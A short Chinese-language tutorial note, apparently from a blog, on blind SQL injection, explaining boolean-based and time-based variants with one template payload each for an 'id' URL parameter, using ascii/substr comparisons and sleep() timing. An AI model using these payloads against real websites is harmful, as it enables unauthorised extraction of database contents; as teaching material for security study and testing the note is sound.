盲注背景:页面没有报错回显,不知道数据库具体的返回值
1、布尔盲注: 使用情况:页面显示真假两种情况
? id=1' and ascii(substr(select查询语句)1,1)>100 --+
2、时间盲注 使用情况:页面没有任何回显
? id=1' and if(ascii(substr(select查询语句)1,1)>100,sleep(0),sleep(3)) --+
浙公网安备 33010602011771号